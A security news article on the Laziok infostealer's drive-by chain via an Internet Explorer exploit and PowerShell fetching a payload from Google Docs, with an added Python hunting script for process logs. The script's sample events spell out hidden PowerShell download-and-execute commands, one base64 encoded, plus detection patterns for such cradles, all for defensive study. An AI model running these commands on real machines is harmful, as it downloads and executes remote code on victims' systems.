Trojan Hits via PowerShell, Google Docs

Tuesday, April 26, 2016 @ 03:04 PM gHale


An information-stealing Trojan called Laziok is now reaching victims through Google Docs and PowerShell, with attackers using the cloud service to host the payload and PowerShell to fetch and run it, researchers said.

Laziok first came to light last year, when attackers used it against energy companies in the Middle East. In that campaign the attackers exploited an old Windows vulnerability to drop the Trojan onto users’ systems.


Attackers found a way past Google’s upload checks and placed the malicious payload on Google Docs, said researchers at FireEye. The payload was uploaded in March and stayed online until Google received FireEye’s notification.

“Users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning,” researchers said in a blog post. “After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.”

The attack chain began on a site run by a Poland-based hosting service. The page loaded obfuscated JavaScript designed to exploit CVE-2014-6332, the Windows OLE automation array vulnerability dubbed “Unicorn,” which Microsoft patched in November 2014 (MS14-064). The exploit therefore only works against systems missing that update; current patch level is the first thing to check when assessing exposure.

When a user opened the attack page in Internet Explorer, the script triggered the bug and applied an exploitation method known as “Godmode,” which turns off VBScript’s safe mode inside the browser. With safe mode gone, VBScript on the page can create objects the sandbox would normally block, such as a command shell, and launch programs on the machine.

The script then launched PowerShell to download the actual malware from Google Docs and execute it.

“PowerShell is also useful for bypassing antivirus software because it is able to inject payloads directly in memory,” FireEye researchers said in the blog.
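The chain described above, a browser-spawned PowerShell that pulls a payload from a trusted cloud host and runs it from memory, is hard to block at the network edge because Google Docs traffic looks legitimate, but it leaves a distinctive trace in endpoint process-creation logs. The following Python is an added example, not code from the article or from FireEye: it scores process-creation records of the shape Sysmon Event ID 1 produces (ParentImage, Image, CommandLine) for the combination of a browser parent, a PowerShell download cradle, in-memory execution, evasion switches and an encoded command line, and it decodes `-EncodedCommand` arguments (base64 of UTF-16LE) so the rules also see the hidden script. The field names are an assumption, and the sample events and Google Docs URLs are constructed for the demonstration.

```python
"""Hunt process-creation logs for a drive-by chain that lands in PowerShell.

Added example. Input shape assumed: dicts with the Sysmon Event ID 1 field
names ParentImage, Image and CommandLine. Sample events below are constructed,
not captured from the campaign the article describes.
"""
import base64
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
# Script hosts a drive-by pivots through on its way to, or as, PowerShell
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Fetching content from the network inside PowerShell ("download cradle")
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Net\.WebClient|"
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer",
    re.IGNORECASE)
# Running fetched content without writing a file, which sidesteps on-access AV scanning
IN_MEMORY_EXEC = re.compile(
    r"Invoke-Expression|\biex\b|FromBase64String|\[Reflection\.Assembly\]::Load|VirtualAlloc",
    re.IGNORECASE)
# Switches that hide the console window or disable the usual guard rails
EVASION_FLAGS = re.compile(
    r"-(?:w|windowstyle)\s+hidden|-no(?:p|profile)\b|-(?:ep|exec|executionpolicy)\s+bypass",
    re.IGNORECASE)
# -EncodedCommand and its abbreviations carry base64 of a UTF-16LE script
ENCODED_COMMAND = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(b64: str) -> str:
    """Turn an -EncodedCommand argument back into script text."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
    return raw.decode("utf-16-le", errors="replace")


@dataclass
class Finding:
    index: int
    parent: str
    image: str
    reasons: List[str] = field(default_factory=list)
    decoded: str = ""


def analyze(index: int, event: dict) -> Optional[Finding]:
    """Score one process-creation event; return a Finding when two or more indicators line up."""
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    if image not in SCRIPT_HOSTS:
        return None
    cmdline = event["CommandLine"]
    decoded = ""
    enc = ENCODED_COMMAND.search(cmdline)
    if enc:
        decoded = decode_encoded_command(enc.group(1))
    searchable = cmdline + "\n" + decoded  # run the content rules over the plaintext too
    reasons = []
    if parent in BROWSERS:
        reasons.append(f"script host spawned by browser {parent}")
    if enc:
        reasons.append("encoded command line")
    if DOWNLOAD_CRADLE.search(searchable):
        reasons.append("download cradle")
    if IN_MEMORY_EXEC.search(searchable):
        reasons.append("in-memory execution")
    if EVASION_FLAGS.search(cmdline):
        reasons.append("hidden window / policy bypass switches")
    # A single indicator is everyday admin usage; two together earn an analyst's attention.
    if len(reasons) < 2:
        return None
    return Finding(index, parent, image, reasons, decoded)


def scan(events) -> List[Finding]:
    return [f for f in (analyze(i, e) for i, e in enumerate(events)) if f is not None]


# Constructed sample events; the Google Docs URLs are placeholders, not the real ones.
ENCODED_PLAINTEXT = ("(New-Object Net.WebClient).DownloadFile('https://docs.google.com/uc?id=PLACEHOLDER',"
                     " \"$env:TEMP\\update.exe\"); Start-Process \"$env:TEMP\\update.exe\"")
ENCODED_SAMPLE = base64.b64encode(ENCODED_PLAINTEXT.encode("utf-16-le")).decode("ascii")
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # IE -> PowerShell cradle piped into IEX, the shape of the chain in the article
    {"ParentImage": IE, "Image": PS,
     "CommandLine": "powershell.exe -NoP -W Hidden -Exec Bypass -C \"IEX ((New-Object Net.WebClient)"
                    ".DownloadString('https://docs.google.com/uc?id=PLACEHOLDER'))\""},
    # Same intent hidden behind -EncodedCommand
    {"ParentImage": IE, "Image": PS, "CommandLine": "powershell.exe -NoP -enc " + ENCODED_SAMPLE},
    # Benign maintenance script started from the desktop shell: one indicator only, not flagged
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    # IE spawning its own tab process, not a script host
    {"ParentImage": IE, "Image": IE, "CommandLine": "iexplore.exe SCODEF:1234 CREDAT:5678"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.index}: {f.parent} -> {f.image}: " + "; ".join(f.reasons))
        if f.decoded:
            print("  decoded:", f.decoded)
```

Run against the constructed events, the first two are flagged and the second one's decoded script is shown, while the administrator's `-ExecutionPolicy Bypass -File` invocation scores a single indicator and stays quiet. In production the same logic sits well on PowerShell script block logging (Event ID 4104) as a second source, since an obfuscated command line may only reveal its cradle once the engine has decoded it.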

Once it infects a device, Trojan.Laziok collects information about the system, including a list of installed antivirus products.